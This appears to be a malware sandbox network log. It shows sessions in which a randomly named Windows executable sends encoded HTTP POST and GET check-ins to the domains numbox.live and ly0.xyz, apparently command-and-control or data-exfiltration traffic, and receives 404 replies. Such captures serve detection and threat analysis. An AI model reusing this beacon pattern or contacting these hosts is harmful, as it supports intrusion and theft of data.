31	192.168.11.20	49849	63.250.47.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:39.847791910 CEST	2578	OUT	POST /q7ah/ HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.numbox.live Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.numbox.live/q7ah/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 6c 33 36 77 46 63 39 51 6c 6e 6a 58 43 69 55 52 67 70 38 45 66 31 4a 75 55 56 6e 5a 6f 6c 61 4f 56 51 4d 31 36 6a 38 46 6b 4b 69 72 79 69 37 55 52 57 48 41 51 35 71 75 69 62 4e 47 6f 56 5a 59 59 4b 4b 41 6d 76 41 71 2f 6a 30 6d 34 38 2b 45 79 50 38 34 55 6c 56 4b 68 6b 2f 77 4d 78 4e 49 30 4c 32 42 57 55 58 57 34 69 53 4b 43 36 61 78 79 6e 2f 52 67 65 70 6d 2b 72 32 63 75 30 37 2f 62 2b 2b 4f 6b 38 30 63 59 76 65 51 44 36 64 62 6c 68 71 79 58 46 30 4b 76 6c 4d 6b 54 57 6b 48 36 71 54 2f 45 79 72 65 37 31 58 2b 43 45 4a 38 33 4a 6e 72 57 6b 4b 6c 66 31 6d 65 79 50 6a 50 4f 65 44 65 46 67 62 59 52 59 66 56 59 7a 68 4e 37 37 58 79 64 73 5a 39 41 36 39 32 31 56 63 31 63 48 5a 4f 37 47 78 55 4f 72 49 70 41 4b 43 71 50 38 49 75 70 6c 39 39 64 77 66 46 7a 53 34 39 6b 35 72 57 37 49 78 4d 55 77 79 76 46 34 6b 52 31 6f 7a 50 2b 54 68 48 4e 42 77 77 4a 6d 50 38 72 6f 71 41 [TRUNCATED] Data Ascii: ATk=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyul36wFc9QlnjXCiURgp8Ef1JuUVnZolaOVQM16j8FkKiryi7URWHAQ5quibNGoVZYYKKAmvAq/j0m48+EyP84UlVKhk/wMxNI0L2BWUXW4iSKC6axyn/Rgepm+r2cu07/b++Ok80cYveQD6dblhqyXF0KvlMkTWkH6qT/Eyre71X+CEJ83JnrWkKlf1meyPjPOeDeFgbYRYfVYzhN77XydsZ9A6921Vc1cHZO7GxUOrIpAKCqP8Iupl99dwfFzS49k5rW7IxMUwyvF4kR1ozP+ThHNBwwJmP8roqAIR2TiqQOF2b2kdR5LwN5k9xjKxuQV4uAcYDkGWR4NJbxm4/7zpaNplqYtQgHgYjQ3FFtbM5cVhIs1bmydiTqE8QrAoNCVW/cPPokAWgVxV9oLrAyYdoWL+TXSsMAaRtvpJxjicJDiw14IZZRkyKH+zj8T1soDDRjcfXbV+klacYsPykGspIaykANOkc8FjW/Ubb34a/6iZ8mxKm/P+Q9nX6/ddWyDJk2JjXffJOhZZe3+Qrr2y2/Xffvs+qUJBQGtcK1YCcI6UQFsW5t8CbPPF40V8y/PTl1TtPJackqcdbSiSBO6IK3Awuvy15TfUAhh1MaHN38VzwUJYdi3LEGY35NOADUi+9Vys8QG4MIKWwBw7t7CZ71W0f5KAgGaNFxjLDD1soij7eRtkhh9BRrz3ovFcI8QiCrC9UQDa9N/yNw2smpA7hqEikjKgIWM+j0mktInqAx9mj2GeMpNx+79pJnFo5IgqDM+/1jhmXUseM0qydWPzC1ZENBxRNJuk+dcfmihLRLpvNQr1PR2QhJ+eAGK31bCPg+73ftNvV9wrOscfgVYHNXawqtYe4d645B5xQHcHV6f/ivTZc3c3sr16OAP+jz5dFU0Bcei+dT6/md73yXlGI1GPQwOX4JiKkSXn0WzcmYT4Ck67zuiG8yNcXTWBiwemrmFV [TRUNCATED]
Oct 11, 2024 10:02:39.847825050 CEST	5383	OUT	Data Raw: 38 70 59 49 45 77 52 55 7a 6b 4f 53 37 48 64 32 61 7a 39 33 66 42 6e 4c 4f 67 63 38 57 51 65 6e 2b 70 57 42 2f 57 49 2b 42 41 51 73 45 2f 59 41 6e 2b 52 61 35 44 62 55 36 76 71 71 4f 33 6b 39 34 68 59 72 4f 46 75 56 59 66 64 5a 67 57 47 4b 72 52 Data Ascii: 8pYIEwRUzkOS7Hd2az93fBnLOgc8WQen+pWB/WI+BAQsE/YAn+Ra5DbU6vqqO3k94hYrOFuVYfdZgWGKrR8i3/iE9lAe90nuEEX/0yWJLEbOAmdTHsvkQXwdF2OaMzja+jEqfP9EmS25Mh+dgGD3Nl6NcGCyjHP976oGhW+HGh0NloZyt37rR3RyMG4+0CmgRCdY8ZZZEq01d2USOJB9Cw9xncNiHkeqSH6ryi3ykRYYNZFugQj
Oct 11, 2024 10:02:40.027215004 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:39 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:02:40.027237892 CEST	1289	IN	Data Raw: 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 Data Ascii: f lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css
Oct 11, 2024 10:02:40.027250051 CEST	1289	IN	Data Raw: 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 32 3c 2f Data Ascii: ><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Cont
Oct 11, 2024 10:02:40.027307034 CEST	673	IN	Data Raw: 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 Data Ascii: form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49850	63.250.47.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:42.545835018 CEST	539	OUT	GET /q7ah/?ATk=yQb1MnoYePGa+D7HYXNMgCWfQwyPM5qgSNNB5eb+vdtsin1jnkdmik2CDVoWxFHrVuMckJ02SL88S12T7EptqLmfnh4CTyoL2s7wDlIiRZZ8USqQIrqm93w=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.numbox.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:02:42.719320059 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:42 GMT Server: Apache Content-Length: 4395 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester \| 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 11, 2024 10:02:42.719333887 CEST	1289	IN	Data Raw: 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: dif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.goo
Oct 11, 2024 10:02:42.719418049 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 Data Ascii: <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="con
Oct 11, 2024 10:02:42.719428062 CEST	688	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 Data Ascii: </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49851	172.67.220.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:47.946352959 CEST	780	OUT	POST /vshw/ HTTP/1.1 Host: www.ly0.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.ly0.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.ly0.xyz/vshw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 78 61 43 75 2f 77 57 53 6c 73 61 4f 64 36 2f 4a 35 34 7a 57 4e 52 4b 6c 37 71 2b 56 37 6d 67 31 30 59 63 36 50 58 4d 2b 30 53 7a 32 6a 34 48 36 50 56 38 75 75 66 54 49 4a 73 33 66 59 75 5a 69 6f 7a 43 63 67 4b 6f 38 4d 59 53 4f 52 72 72 64 6d 53 73 56 2f 61 33 30 74 6b 44 46 6b 6c 63 55 71 43 68 2f 77 4a 5a 58 4f 65 4a 6b 46 4a 48 68 69 47 30 6e 6a 39 55 54 74 62 35 70 47 55 34 52 7a 42 72 7a 6a 6e 55 45 75 4d 4f 44 54 6c 7a 4a 66 35 4c 57 6f 7a 73 68 4b 4c 43 74 4d 30 70 48 48 35 64 41 57 61 73 4d 48 67 53 58 32 41 2b 5a 7a 31 47 34 34 77 3d 3d Data Ascii: ATk=JuB01QLRMoG1xaCu/wWSlsaOd6/J54zWNRKl7q+V7mg10Yc6PXM+0Sz2j4H6PV8uufTIJs3fYuZiozCcgKo8MYSORrrdmSsV/a30tkDFklcUqCh/wJZXOeJkFJHhiG0nj9UTtb5pGU4RzBrzjnUEuMODTlzJf5LWozshKLCtM0pHH5dAWasMHgSX2A+Zz1G44w==
Oct 11, 2024 10:02:48.475770950 CEST	707	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAeXZPhhwlJZEX0ki2SdmtD%2FS%2BW%2FYs0AxCGKYC4hVv1W4agSiKPE45WSOSdpHuDOMgpG6i9gdxfhW2iJ39JdO8BW4sMRxd0Yo7zVs7fZp%2BPfbzNvekUkzRVkMQUv%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d5479fe46333c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Oct 11, 2024 10:02:48.475784063 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49852	172.67.220.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:50.575058937 CEST	800	OUT	POST /vshw/ HTTP/1.1 Host: www.ly0.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.ly0.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.ly0.xyz/vshw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 77 31 31 34 73 36 41 79 77 2b 39 43 7a 32 78 59 48 6d 43 31 39 69 75 66 66 36 4a 75 54 66 59 75 4e 69 6f 79 79 63 67 63 67 37 4d 49 53 4d 59 4c 72 66 69 53 73 56 2f 61 33 30 74 6b 57 51 6b 6c 6b 55 70 78 4a 2f 68 62 78 55 43 2b 4a 6e 50 70 48 68 30 47 30 6a 6a 39 56 47 74 66 77 68 47 57 77 52 7a 44 7a 7a 69 32 55 48 67 4d 4f 46 65 46 79 43 56 62 4b 66 72 41 34 4c 4b 36 75 68 41 47 59 69 43 76 4d 61 4c 6f 59 6f 45 7a 4f 6c 79 77 48 78 78 33 48 6a 6c 78 4e 54 4c 63 6b 74 70 78 63 79 6d 6b 4c 6a 6c 73 77 56 65 55 59 3d Data Ascii: ATk=JuB01QLRMoG1z5qu+XCSnMaPY6/JyYzSNRWl7oS/7Tw114s6Ayw+9Cz2xYHmC19iuff6JuTfYuNioyycgcg7MISMYLrfiSsV/a30tkWQklkUpxJ/hbxUC+JnPpHh0G0jj9VGtfwhGWwRzDzzi2UHgMOFeFyCVbKfrA4LK6uhAGYiCvMaLoYoEzOlywHxx3HjlxNTLcktpxcymkLjlswVeUY=
Oct 11, 2024 10:02:51.124764919 CEST	707	IN	HTTP/1.1 404 Not Found Date: Fri, 11 Oct 2024 08:02:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mF0pysan1wHyGdaei4MLHNDHGquJntb%2FJV0OYYqcHU%2F53fNfGZ9C%2B%2F9hIhmoC4QuHUj9kbzeMPWMnqG8f8CDuxweqCAFBax6LGaRTpkeb%2BjZYERY6NsfeFWP3oRcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d0d548a696141bd-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Oct 11, 2024 10:02:51.124778986 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49853	172.67.220.57	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:53.199892998 CEST	2578	OUT	POST /vshw/ HTTP/1.1 Host: www.ly0.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.ly0.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.ly0.xyz/vshw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 34 31 30 4c 6b 36 42 52 59 2b 6e 43 7a 32 71 59 48 32 43 31 39 72 75 65 33 2b 4a 75 66 68 59 73 31 69 36 41 36 63 30 35 41 37 48 49 53 4d 61 4c 72 43 6d 53 73 41 2f 61 6e 77 74 6b 47 51 6b 6c 6b 55 70 33 31 2f 68 4a 5a 55 45 2b 4a 6b 46 4a 48 62 69 47 30 48 6a 35 34 78 74 66 31 44 48 6d 51 52 79 6a 6a 7a 6c 45 38 48 73 4d 4f 48 4e 31 79 52 56 62 47 63 72 41 30 78 4b 35 79 59 41 42 73 69 43 72 4a 62 63 4c 77 63 62 46 47 74 36 54 76 64 37 6b 2f 45 74 51 41 73 50 65 49 6d 70 78 49 71 6f 58 62 64 2f 38 4d 56 49 54 7a 63 50 4a 48 49 4b 6e 43 69 6c 57 6d 53 4d 55 42 34 7a 58 63 68 70 77 75 6c 44 37 71 6e 65 50 42 61 55 39 46 70 68 78 36 48 72 59 72 51 72 56 46 6f 30 50 74 49 52 53 57 5a 66 77 76 38 63 2f 6b 45 57 73 45 6e 64 66 6c 2b 5a 44 39 72 71 6f 6f 45 77 68 65 42 69 46 61 35 48 55 73 63 4c 70 5a 43 66 30 46 5a 4a 4e 36 51 4f 41 2b 6a 49 70 57 31 7a 52 50 6f 64 36 [TRUNCATED] Data Ascii: ATk=JuB01QLRMoG1z5qu+XCSnMaPY6/JyYzSNRWl7oS/7T410Lk6BRY+nCz2qYH2C19rue3+JufhYs1i6A6c05A7HISMaLrCmSsA/anwtkGQklkUp31/hJZUE+JkFJHbiG0Hj54xtf1DHmQRyjjzlE8HsMOHN1yRVbGcrA0xK5yYABsiCrJbcLwcbFGt6Tvd7k/EtQAsPeImpxIqoXbd/8MVITzcPJHIKnCilWmSMUB4zXchpwulD7qnePBaU9Fphx6HrYrQrVFo0PtIRSWZfwv8c/kEWsEndfl+ZD9rqooEwheBiFa5HUscLpZCf0FZJN6QOA+jIpW1zRPod68dP5wEgixwhtGRO5fyzmu3xHtvsM7lCmPkectCvnLBw/fpne8Z5h7zL8G+UTPjsup0oMA/kJDZaqxW1K+K8yAimDu0SHhCqpzO67uXlIyghIwaO0rnArSQmwF/H01c2s+ih3xpJB+4Ut+cLpioJGPQnJIAxMYvrvZT2dDD9894F0+c5MNftsBTkkdMGDLFoD9UPJNeuxn2OxHhDquCn0WNmDqQWRJlvIYBTsDoToPgko5h6Ynk/vHLc2uq3rUNfhRqGTLsdKYw8gQMzblPesmJbWFLzdZ30Hc+6g0Mi7ebf7uTXSjbpL3MDwy3kij779KuKChkJ1eh8LG28Fc//DEpWWrwgoGKH1uA0HMN8x22zhYeATugI7D6rPlyYYg+LFNTr1/gjmJV9PUaeJG0p1Yfdk6JrMrz/u/Qpepaqgq/xCeIRiYadOl00XoCxTpvoVfp42j9WY98ltQndL5Guom86Lj84eBPEanEqgCeOO68OKcfDd+qN7YaPjbHTQSfKw29hi52N7EPuoAwRHEWT3l/ZgzuBT4I9Ob1sCqd6ODYYmZkNatYFT9vpuRuXuOAOQP6tswGaIuq2cPRlJ2trZRB/HM2cMddRNeTWzSrhRwV0PVSBxwG6FBkc3sh9llAqldYSEjNZPOS3Zi/oF3tay41S5X5HoqVO2Np [TRUNCATED]
Oct 11, 2024 10:02:53.199915886 CEST	3867	OUT	Data Raw: 2f 6b 32 35 63 45 4c 43 33 63 72 6d 70 64 78 75 4c 54 42 33 52 67 59 6b 47 5a 4e 42 30 30 42 6b 44 6f 67 6d 35 73 4f 73 2b 4f 6e 6e 6b 48 48 4a 6d 6f 4d 38 66 65 7a 61 41 54 2b 50 4d 49 6c 6f 48 68 2b 66 47 6c 4d 4e 53 31 32 37 4e 6a 56 64 6a 6a Data Ascii: /k25cELC3crmpdxuLTB3RgYkGZNB00BkDogm5sOs+OnnkHHJmoM8fezaAT+PMIloHh+fGlMNS127NjVdjjTRrY6gv+SHS6glzRexaWHwnL/Hm+Z1TCVMvceeFQwqEX/LkYdnl4vWxw6BnCCQYRe96K65aytJ8woAQJGqIDd1c2CG4vaxC7stNAL/NBHgj+4AsIKkV0AtPBTnqPpVwrTSWAXV9GU1mZu7y5F07qJKs0zMSVZ/jZN
Oct 11, 2024 10:02:53.199990034 CEST	1504	OUT	Data Raw: 67 56 6e 47 57 35 47 4b 41 43 48 4a 77 73 33 52 47 4d 64 63 55 39 4d 37 4e 71 56 43 54 51 7a 42 77 6f 49 42 36 42 2f 71 79 44 6c 45 37 7a 48 4d 39 50 78 4e 32 55 74 75 6f 4c 6f 4b 78 57 36 4a 35 63 73 41 47 41 72 66 32 45 67 5a 75 2b 49 31 33 63 Data Ascii: gVnGW5GKACHJws3RGMdcU9M7NqVCTQzBwoIB6B/qyDlE7zHM9PxN2UtuoLoKxW6J5csAGArf2EgZu+I13cdTgA9EUSZ+SW4jhRLwa9Z5lXlCCtFiJEU1RN9IONsvB7m8MAdRCrkr2nUyfZiBnVvqKGC8DDGTW4+sV+gIPgLq9eWUtBpTcld1i9HMiGFk3ZUWOtU9X2J/sHJscuQ3heBemM/YzkWmsc4Uv3/89VVmhGkRGshb9yO
